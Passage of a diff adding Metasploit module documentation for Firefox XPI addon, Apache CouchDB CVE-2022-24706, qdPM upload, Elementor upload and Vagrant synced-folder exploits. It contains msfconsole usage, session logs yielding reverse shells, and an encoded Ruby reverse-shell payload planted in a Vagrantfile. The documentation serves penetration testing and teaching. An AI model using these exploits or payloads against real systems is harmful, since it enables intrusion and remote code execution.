+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```
@@ -0,0 +1,69 @@
+## Vulnerable Application
+
+Mozilla Firefox before version 41 allowed users to install
+unsigned browser extensions from arbitrary web servers.
+
+This module dynamically creates an unsigned .xpi addon file.
+The resulting bootstrapped Firefox addon is presented to
+the victim via a web page. The victim's Firefox browser
+will pop a dialog asking if they trust the addon.
+
+Once the user clicks "install", the addon is installed and
+executes the payload with full user permissions. As of Firefox
+4, this will work without a restart as the addon is marked to
+be "bootstrapped". As the addon will execute the payload after
+each Firefox restart, an option can be given to automatically
+uninstall the addon once the payload has been executed.
+
+As of Firefox 41, unsigned extensions can still be installed
+on Firefox Nightly, Unbranded and Development builds when
+configured with `xpinstall.signatures.required` set to `false`.
+
+Note: this module generates legacy extensions which are
+supported only in Firefox before version 57.
+
+
+### Installation
+
+Download an old Developer Edition (version 4 < 57) installer from:
+
+* https://download-origin.cdn.mozilla.net/pub/devedition/releases/
+
+Browse to `about:config` and set `xpinstall.signatures.required` to `false`.
+
+Open Tools -> Options, search for "updates" and select "Never check for updates".
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
+1. Do: `set SRVHOST [IP]`
+1. Do: `run`
+
+## Options
+
+
+## Scenarios
+
+### Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled
+
+Run the module and load the web server URL in Firefox. Install the extension when prompted.
+
+```
+msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon 
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/Oj8qCs
+[*] Server started.
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > 
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Redirecting request.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending HTML response.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400
+```
@@ -0,0 +1,262 @@
+## Vulnerable Application
+### Description
+This module exploits CVE-2022-24706, an unauthenticated RCE vulnerability in Apache CouchDB in versions 3.2.1 and below.
+
+Apache CouchDB is written in Erlang and so it has built-in support for distributed computing (clustering). The
+cluster nodes communicate using the Erlang/OTP Distribution Protocol, which provides for the possibility of executing
+OS command requests as the user running the software.
+
+In order to connect and run OS commands, one needs to know the secret phrase or in Erlang terms the "cookie". The CouchDB
+installer in versions 3.2.1 and below, by default, sets the cookie to "monster".
+
+### Setup
+#### Ubuntu 20.04
+Create a CouchDB user:
+```
+sudo adduser --system \
+             --home /opt/couchdb \
+             --no-create-home \
+             --shell /bin/bash \
+             --group --gecos \
+             "CouchDB Administrator" couchdb
+sudo passwd couchdb
+```
+
+Install dependencies:
+```
+sudo apt-get --no-install-recommends -y install \
+    build-essential pkg-config erlang erlang-reltool \
+    libicu-dev libmozjs-68-dev python3
+sudo apt-get -y install pip sphinx-doc sphinx-common
+sudo pip install --upgrade sphinx_rtd_theme nose requests hypothesis
+```
+
+Download vulnerable version of CouchDB:
+```
+wget https://downloads.apache.org/couchdb/source/3.2.1/apache-couchdb-3.2.1.tar.gz
+gunzip apache-couchdb-3.2.1.tar.gz
+tar -xvf apache-couchdb-3.2.1.tar
+```
+
+Copy the built couchdb release to the new user's home directory:
+`cp -R /path/to/couchdb/rel/couchdb /opt/couchdb`
+
+Change the ownership & permission of the CouchDB directories by running:
+```
+chown -R couchdb:couchdb /opt/couchdb
+find /opt/couchdb -type d -exec chmod 0770 {} \;
+```
+
+Update the permissions for the ini files:
+`chmod 0644 /opt/couchdb/etc/*`
+
+Change the bind address of `[chttpd]` and `[httpd]` in `</path/to/couchdb/>/etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
+or whatever you prefer.
+```
+[httpd]
+port = 5986
+bind_address = 0.0.0.0
+[chttpd]
+; These settings affect the main, clustered port (5984 by default).
+port = 5984
+bind_address = 0.0.0.0
+```
+
+You can start the CouchDB server by running:
+`sudo -i -u couchdb couchdb/bin/couchdb`
+
+Navigate to `http://<IP-ADDRESS>:5984/_utils/` to verify the install
+
+#### Windows
+
+Download the following installer:
+`https://archive.apache.org/dist/couchdb/binary/win/2.3.1/apache-couchdb-2.3.1.msi`
+
+Click the installer to launch, accept the licensing agreement. CouchDB should now be installed.
+
+Change the bind address of `[chttpd]` and `[httpd]` in `</path/to/couchdb/>etc/default.ini` from 127.0.0.1 to 0.0.0.0 or
+or whatever you prefer
+```
+[httpd]
+port = 5986
+bind_address = 0.0.0.0
+[chttpd]
+; These settings affect the main, clustered port (5984 by default).
+port = 5984
+bind_address = 0.0.0.0
+```
+Restart the `Apache CouchDB` service: `net stop "Apache CouchDB"` and then `net start "Apache CouchDB"` in an administrative console.
+Then navigate to `http://<IP-ADDRESS>:5984/_utils/` to verify that the install completed successfully. You should see a page with
+`Databases` at the top of the screen and a navigation bar to the left of the screen if all goes well.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/multi/http/apache_couchdb_erlang_rce`
+1. Set the `RHOST` and `LHOST` values
+1. `exploit`
+1. Verify: That you receive a session as the user that is running the ApacheDB application.
+
+## Scenarios
+### Unix Command, Ubuntu 20.04, Apache CouchDB 3.2.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse double SSL handler on 172.16.199.1:4444
+[*] 172.16.199.164:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.164:4369...
+[*] 172.16.199.164:4369 - Successfully found EDPM socket
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.164:4369 - Connection successful
+[*] 172.16.199.164:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.164:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
+[*] 172.16.199.164:4369 - sending payload...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo t82KLKYvcDd54em2;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "t82KLKYvcDd54em2\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 1 opened (172.16.199.1:4443 -> 172.16.199.164:53778) at 2022-10-13 14:09:49 -0400
+
+id
+uid=128(couchdb) gid=134(couchdb) groups=134(couchdb)
+uname -a
+Linux ubuntu 5.15.0-50-generic #56~20.04.1-Ubuntu SMP Tue Sep 27 15:51:29 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Linux Dropper, Ubuntu 20.04, Apache CouchDB 3.2.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.164:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.164:4369...
+[*] 172.16.199.164:4369 - Successfully found EDPM socket
+[*] 172.16.199.164:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.164:4369 - Connection successful
+[*] 172.16.199.164:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.164:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
+[*] 172.16.199.164:4369 - Using URL: http://172.16.199.1:8080/xiNdbG3
+[*] 172.16.199.164:4369 - sending payload...
+[*] 172.16.199.164:4369 - Client 172.16.199.164 (Wget/1.20.3 (linux-gnu)) requested /xiNdbG3
+[*] 172.16.199.164:4369 - Sending payload to 172.16.199.164 (Wget/1.20.3 (linux-gnu))
+[*] Meterpreter session 10 opened (172.16.199.1:4444 -> 172.16.199.164:57710) at 2022-10-17 18:33:57 -0400
+[*] 172.16.199.164:4369 - Command Stager progress - 100.00% done (112/112 bytes)
+[*] 172.16.199.164:4369 - Server stopped.
+
+meterpreter > getuid
+Server username: couchdb
+meterpreter > sysinfo
+Computer     : 172.16.199.164
+OS           : Ubuntu 20.04 (Linux 5.15.0-50-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > exit
+```
+
+### Windows Command, Windows 10, Apache CouchDB 2.3.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.137:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.137:4369...
+[*] 172.16.199.137:4369 - Successfully found EDPM socket
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.137:4369 - Connection successful
+[*] 172.16.199.137:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.137:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
+[*] 172.16.199.137:4369 - sending payload...
+[*] Powershell session session 11 opened (172.16.199.1:4444 -> 172.16.199.137:49762) at 2022-10-17 18:44:16 -0400
+
+
+Shell Banner:
+Windows PowerShell running as user DESKTOP-8ATHH6O$ on DESKTOP-8ATHH6O
+Copyright (C) Microsoft Corporation. All rights reserved.
+-----
+
+PS C:\CouchDB> whoami
+nt authority\system
+PS C:\CouchDB> systeminfo
+
+Host Name:                 DESKTOP-8ATHH6O
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+...
+PS C:\CouchDB>
+```
+
+### Windows Dropper, Windows 10, Apache CouchDB 2.3.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.137:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.137:4369...
+[*] 172.16.199.137:4369 - Successfully found EDPM socket
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.137:4369 - Connection successful
+[*] 172.16.199.137:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.137:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
+[*] 172.16.199.137:4369 - sending payload...
+...
+[*] 172.16.199.137:4369 - Command Stager progress -  99.41% done (306900/308720 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] Meterpreter session 5 opened (172.16.199.1:4444 -> 172.16.199.137:49749) at 2022-10-14 17:09:31 -0400
+[*] 172.16.199.137:4369 - Command Stager progress - 100.00% done (308720/308720 bytes)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-8ATHH6O
+OS              : Windows 10 (10.0 Build 19042).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+### PowerShell Stager, Windows 10, Apache CouchDB 2.3.1
+```
+msf6 exploit(multi/http/apache_couchdb_erlang_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.137:4369 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: 172.16.199.137:4369...
+[*] 172.16.199.137:4369 - Successfully found EDPM socket
+[*] 172.16.199.137:4369 - Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...
+[*] 172.16.199.137:4369 - Connection successful
+[*] 172.16.199.137:4369 - Erlang challenge and response completed successfully
+[+] 172.16.199.137:4369 - The target is vulnerable. Successfully connected to the Erlang Server with cookie: "monster"
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  20.94% done (2046/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  41.88% done (4092/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  62.82% done (6138/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] 172.16.199.137:4369 - Command Stager progress -  83.77% done (8184/9770 bytes)
+[*] 172.16.199.137:4369 - sending payload...
+[*] Sending stage (222278 bytes) to 172.16.199.137
+[*] Meterpreter session 12 opened (172.16.199.1:4444 -> 172.16.199.137:49773) at 2022-10-17 18:45:56 -0400
+[*] 172.16.199.137:4369 - Command Stager progress - 100.00% done (9770/9770 bytes)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DESKTOP-8ATHH6O
+OS              : Windows 10 (10.0 Build 19042).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```
@@ -18,6 +18,17 @@ exploitation can take a few minutes.
  6.  Verify the module yields a PHP meterpreter session in < 5 minutes
  7.  Verify the malicious PHP file was automatically removed

+## Options
+
+### WAIT_TIMEOUT
+Seconds to wait to trigger the payload
+### NameField
+Name of the element for the Name field
+### EmailField
+Name of the element for the Email field
+### MessageField
+Name of the element for the Message field
+
 ## Scenarios

  Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module exploits a arbitrary file upload vulnerability in the qdPM web-based project manager software, in its 9.1 version. When updating a user's profile (POST `myAccount/update`), the user is allowed to upload a profile picture, which is stored in a known location under the web server root. The software fails to verify the picture input, allowing for the upload of any file, with any filename extension. This can be exploited by uploading a PHP script and invoking it by making a request to it. 
+The script will run with the same privileges as the web server.
+The module has been tested against qdPM version 9.1
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/qdpm_authenticated_rce`
+- [ ] `set EMAIL <email>`
+- [ ] `set PASSWORD <password>`
+- [ ] `set TARGETURI <target_uri>`
+- [ ] `set RHOST <rhost>`
+- [ ] `set RPORT <rport>`
+- [ ] `exploit`
+- [ ] Add SSL, Proxy, and VHOST options if needed.
+- [ ] Verify that a new session is created.
+
+## Options
+
+  **EMAIL**  
+  [Required]  
+  The email of the user you want to exploit the software with. The user must NOT be the original Admin (i.e. the account created upon installing qdPM, `admin@your_domain.com`). The original Admin user does not have the same attributes as the other user created later on, and its profile picture cannot be changed. In fact, it has no profile picure nor a `/myAccount` page altogether. If you only have credentials for the original admin, you can always login and create another regular user to run this exploit. Note that users with Admin role are also exploitable, only the one created upon installation is not.
+
+  **PASSWORD**  
+  [Required]  
+  The password of the user you are trying to exploit.
+
+  **TARGETURI**  
+  The path qdPM lives at. This is only needed is qdPM is not served from the webserver root folder.
+
+## Scenarios
+
+As it can be shown by the following scenarios, the exploit works reliably against a variety of targets. The exploit, however, might fail when a large payload (i.e. stageless meterpreter) is selected.
+  
+   
+  **Attacking with a generic PHP payload, OS independed**
+
+```
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set target Generic\ (PHP\ Payload)
+target => Generic (PHP Payload)
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+[msf](Jobs:0 Agents:0) exploit(multi/http/qdpm_authenticated_rce) >> exploit
+
+[*] Started reverse TCP handler on 192.168.2.177:4444
+[*] Attempt to login with 'johndoe@localhost.com:easyone'
+[*] Uploading PHP payload (1123 bytes)...
+[*] Executing 'JGvak.php'
+[*] Sending stage (39927 bytes) to 192.168.2.177
+[!] Removing: 993379-JGvak.php
+[*] Meterpreter session 2 opened (192.168.2.177:4444 -> 192.168.2.177:43816) at 2022-06-14 10:03:46 +0200
+
+(Meterpreter 1)(/home/giacomo/qdPM/uploads/users) > getuid
+Server username: www-data
+```
+
+## Installation
+
+QDPM 9.1 relies on outdated software, and installing it can be quite nuanced. Please run the provided script to get the application set up together with a web server, the right version of PHP, and MySQL. This is tested on a fresh installation of Ubuntu Server 22.04.
+
+```
+apt install software-properties-common -y
+add-apt-repository ppa:ondrej/php
+apt update
+apt install -y nginx php7.3-fpm php7.3-mysql php7.3-xml php7.3-gd mariadb-server unzip wget
+systemctl enable --now mariadb.service php7.3-fpm.service
+mysql -e "UPDATE mysql.user SET Password = PASSWORD('password') WHERE User = 'root'"
+mysql -e "DROP USER ''@'$(hostname)'"
+mysql -e "DROP DATABASE test"
+mysql -e "FLUSH PRIVILEGES"
+mysql -e "CREATE DATABASE qdpm_db default charset utf8"
+mysql -e "CREATE USER 'user'@'localhost' IDENTIFIED BY 'pass'"
+mysql -e "GRANT ALL PRIVILEGES ON qdpm_db.* TO 'user'@'localhost';"
+cd /opt
+wget https://www.exploit-db.com/apps/f922670e98bcbcff923d9bfaf430e669-qdPM_9.1.zip -O qdPM_9.1.zip
+unzip -d /var/www/html/qdpm qdPM_9.1.zip
+rm qdPM_9.1.zip
+chown -R www-data:www-data /var/www/html/qdpm/
+rm /etc/nginx/sites-available/default
+rm /etc/nginx/sites-enabled/default
+tee -a /etc/nginx/sites-available/default > /dev/null <<EOT
+server {
+    listen 80 default_server;
+    listen [::]:80 default_server;
+    root /var/www/html/qdpm/;
+    index index.php;
+
+    location / {
+        try_files \$uri /index.php\$is_args\$args;
+    }
+
+    location ~* \.php$ {
+        fastcgi_pass unix:/var/run/php/php7.3-fpm.sock;
+        include fastcgi_params;
+        fastcgi_param SCRIPT_FILENAME \$realpath_root\$fastcgi_script_name;
+        fastcgi_param DOCUMENT_ROOT \$realpath_root;
+    }
+
+    error_log /var/log/nginx/qdpm_error.log;
+    access_log /var/log/nginx/qdpm_access.log;
+}
+EOT
+ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/
+systemctl start nginx.service
+systemctl reload nginx.service
+```
+
+If the script runs successfully, you should have a webserver serving the application on port 80.  
+Visit the website to complete the installation via the web installer. It will ask you to fill in the database name, user, and password. Those will be `qdpm_db`, `user`, and `pass` respectively. Then, create a password for your `admin@localhost.com` account and login with it. You can now create a second user to run the exploit against.
@@ -23,6 +23,12 @@ Confirm that functionality works:
 5. Run the exploit: `run`
 6. Confirm you have now a meterpreter session

+## Options
+
+### THEME_DIR
+
+The name of the theme Wordpress is using. Used if
+the theme cannot be auto-detected.

 ## Scenarios

@@ -0,0 +1,74 @@
+## Vulnerable Application
+
+The WordPress plugin Elementor versions 3.6.0 - 3.6.2, inclusive have a vulnerability
+that allows any authenticated user to upload and execute any PHP file. This is achieved
+by sending a request to install Elementor Pro from a user supplied zip file.
+Any user with Subscriber or more permissions is able to execute this.
+
+Tested against Elementor 3.6.1
+
+### Plugin
+
+Can be downloaded from https://wordpress.org/plugins/elementor/advanced/
+
+## Verification Steps
+
+
+1. Install the plugin, no configuration is required, just hit skip.
+2. Start msfconsole
+3. Do: `use exploits/multi/http/wp_plugin_elementor_auth_upload_rce`
+4. Do: `set username [username]`
+5. Do: `set password [password]`
+6. Do: `set rhosts [ip]`
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+### PASSWORD
+
+The username for a user with subscriber or higher privileges
+
+### PASSWORD
+
+The username for a user with subscriber or higher privileges
+
+## Scenarios
+
+
+### Elementor 3.6.1 on Wordpress 5.7.7 on Ubuntu 20.04
+
+```
+resource (elementor.rb)> use exploits/multi/http/wp_plugin_elementor_auth_upload_rce
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+resource (elementor.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (elementor.rb)> set username user
+username => user
+resource (elementor.rb)> set password user
+password => user
+resource (elementor.rb)> set verbose true
+verbose => true
+msf6 exploit(multi/http/wp_plugin_elementor_auth_upload_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/elementor/readme.txt
+[*] Found version 3.6.1 in the plugin
+[+] The target appears to be vulnerable.
+[*] Looking for nonce
+[+] Nonce: cfb42a92ae
+[*] Uploading upgrade payload and activating...
+[*] Payload file name: elementor-pro.php
+[*] Sending stage (39927 bytes) to 2.2.2.2
+[+] Deleted ../wp-content/plugins/elementor-pro
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:33052) at 2022-10-02 15:56:35 -0400
+[+] Payload Uploaded Successfully
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : wordpress2004
+OS          : Linux wordpress2004 5.4.0-104-generic #118-Ubuntu SMP Wed Mar 2 19:02:41 UTC 2022 x86_64
+Meterpreter : php/linux
+```
@@ -0,0 +1,277 @@
+## Vulnerable Application
+
+This module exploits a default Vagrant synced folder (shared folder)
+to append a Ruby payload to the Vagrant project Vagrantfile config file.
+
+By default, unless a Vagrant project explicitly disables shared folders,
+Vagrant mounts the project directory on the host as a writable 'vagrant'
+directory on the guest virtual machine. This directory includes the
+project Vagrantfile configuration file.
+
+Ruby code within the Vagrantfile is loaded and executed when a user
+runs any vagrant command from the project directory on the host,
+leading to execution of Ruby code on the host.
+
+## Installation
+
+Install a virtualization provider. Vagrant uses VirtualBox by default.
+
+Download and install Vagrant:
+
+* https://www.vagrantup.com/downloads
+
+Follow the Getting Started tutorial to create a simple Vagrant project with guest virtual machine:
+
+* https://learn.hashicorp.com/tutorials/vagrant/getting-started-project-setup?in=vagrant/getting-started
+
+Note that this will require approximately 3GB of free disk space.
+
+Example using `hashicorp/bionic64` box:
+
+```
+$ mkdir vagrant_getting_started
+$ cd vagrant_getting_started/
+$ vagrant init hashicorp/bionic64
+A `Vagrantfile` has been placed in this directory. You are now
+ready to `vagrant up` your first virtual environment! Please read
+the comments in the Vagrantfile as well as documentation on
+`vagrantup.com` for more information on using Vagrant.
+$ vagrant up
+Bringing machine 'default' up with 'virtualbox' provider...
+==> default: Box 'hashicorp/bionic64' could not be found. Attempting to find and install...
+    default: Box Provider: virtualbox
+    default: Box Version: >= 0
+==> default: Loading metadata for box 'hashicorp/bionic64'
+    default: URL: https://vagrantcloud.com/hashicorp/bionic64
+==> default: Adding box 'hashicorp/bionic64' (v1.0.282) for provider: virtualbox
+    default: Downloading: https://vagrantcloud.com/hashicorp/boxes/bionic64/versions/1.0.282/providers/virtualbox.box
+==> default: Successfully added box 'hashicorp/bionic64' (v1.0.282) for 'virtualbox'!
+==> default: Importing base box 'hashicorp/bionic64'...
+==> default: Matching MAC address for NAT networking...
+==> default: Checking if box 'hashicorp/bionic64' version '1.0.282' is up to date...
+==> default: Setting the name of the VM: vagrant_getting_started_default_1664845773160_64119
+==> default: Clearing any previously set network interfaces...
+==> default: Preparing network interfaces based on configuration...
+    default: Adapter 1: nat
+==> default: Forwarding ports...
+    default: 22 (guest) => 2222 (host) (adapter 1)
+==> default: Booting VM...
+==> default: Waiting for machine to boot. This may take a few minutes...
+    default: SSH address: 127.0.0.1:2222
+    default: SSH username: vagrant
+    default: SSH auth method: private key
+    default: Warning: Connection reset. Retrying...
+    default: 
+    default: Vagrant insecure key detected. Vagrant will automatically replace
+    default: this with a newly generated keypair for better security.
+    default: 
+    default: Inserting generated public key within guest...
+    default: Removing insecure key from the guest if it's present...
+    default: Key inserted! Disconnecting and reconnecting using new SSH key...
+==> default: Machine booted and ready!
+==> default: Checking for guest additions in VM...
+    default: The guest additions on this VM do not match the installed version of
+    default: VirtualBox! In most cases this is fine, but in rare cases it can
+    default: prevent things such as shared folders from working properly. If you see
+    default: shared folder errors, please make sure the guest additions within the
+    default: virtual machine match the version of VirtualBox you have installed on
+    default: your host and reload your VM.
+    default: 
+    default: Guest Additions Version: 6.0.10
+    default: VirtualBox Version: 6.1
+==> default: Mounting shared folders...
+    default: /vagrant => /home/user/vagrant/vagrant_getting_started
+```
+
+
+Note: As the virtual machine resides within a virtual NAT environment,
+for testing purposes it may be easier to bridge the virtual machine network
+adapter to allow access from the LAN. This can be achieved by modifying
+the virtual machine network adapter settings via the `virtualbox` GUI.
+
+Also note that in doing so you are opening an intentionally vulnerable guest
+VM to your network for the purposes of executing arbitrary code on the host.
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Get a session within a Vagrant guest virtual machine
+1. Do: `use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout`
+1. Do: `set SESSION <session>`
+1. Do: `check`
+1. The module should report that the host appears to be vulnerable
+1. Do: `set PAYLOAD ruby/shell_reverse_tcp`
+1. Do: `set lhost <lhost>`
+1. Do: `set lport <lport>`
+1. Do: `run`
+1. The module should report that the payload was written successfully
+1. Do: `use exploit/multi/handler`
+1. Do: `set PAYLOAD ruby/shell_reverse_tcp`
+1. Do: `set lhost <lhost>`
+1. Do: `set lport <lport>`
+1. Do: `run -jz`
+1. Wait until a user runs a vagrant command from within the project directory on the host system (ie, `vagrant status`)
+1. You should get a new session on the host operating system
+
+
+## Options
+
+### VAGRANTFILE_PATH
+
+Path to `Vagrantfile` (leave blank to auto detect).
+
+
+## Scenarios
+
+### hashicorp/bionic64 guest virtual machine in Vagrant 2.3.1 with VirtualBox 6.1 running on Ubuntu 22.04.1
+
+```
+msf6 > sessions -i 1 -C sysinfo
+[*] Running 'sysinfo' on meterpreter session 1 (::1)
+Computer     : vagrant.vm
+OS           : Ubuntu 18.04 (Linux 4.15.0-58-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+msf6 > sessions -i 1 -C getuid
+[*] Running 'getuid' on meterpreter session 1 (::1)
+Server username: vagrant
+msf6 > use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout 
+[*] Using configured payload ruby/shell_reverse_tcp
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set session 1
+session => 1
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lport 4444
+lport => 4444
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > check
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session platform: windows
+[*] The service is running, but could not be validated. Could not verify if C:\vagrant\Vagrantfile is writable.
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session platform: windows
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Could not verify if C:\vagrant\Vagrantfile is writable.
+[*] Appending payload (516 bytes) to C:\vagrant\Vagrantfile ...
+[*] Payload appended to C:\vagrant\Vagrantfile
+[*] The payload will be executed when a user runs any vagrant command from within the project directory on the host system.
+[!] This module requires manual removal of the payload from the project Vagrantfile: C:\vagrant\Vagrantfile
+msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > use exploit/multi/handler 
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(multi/handler) > set payload ruby/shell_reverse_tcp
+payload => ruby/shell_reverse_tcp
+msf6 exploit(multi/handler) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(multi/handler) > set lport 4444
+lport => 4444
+msf6 exploit(multi/handler) > run -jz
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf6 exploit(multi/handler) > [*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:44242) at 2022-10-16 05:46:32 -0400
+
+msf6 exploit(multi/handler) > sessions -i 2
+[*] Starting interaction with 2...
+
+id
+uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt)
+pwd
+/home/user/vagrant/vagrant_getting_started
+tail -n 13 Vagrantfile
+
+code = %(cmVxdWlyZSAnc29ja2V0JztjPVRDUFNvY2tldC5uZXcoIjE5Mi4xNjguMjAwLjEzMCIsIDQ0NDQpOyRzdGRpbi5yZW9wZW4oYyk7JHN0ZG91dC5yZW9wZW4oYyk7JHN0ZGVyci5yZW9wZW4oYyk7JHN0ZGluLmVhY2hfbGluZXt8bHxsPWwuc3RyaXA7bmV4dCBpZiBsLmxlbmd0aD09MDsoSU8ucG9wZW4obCwicmIiKXt8ZmR8IGZkLmVhY2hfbGluZSB7fG98IGMucHV0cyhvLnN0cmlwKSB9fSkgcmVzY3VlIG5pbCB9).unpack(%(m0)).first
+if RUBY_PLATFORM =~ /mswin|mingw|win32/
+inp = IO.popen(%(ruby), %(wb)) rescue nil
+if inp
+inp.write(code)
+inp.close
+end
+else
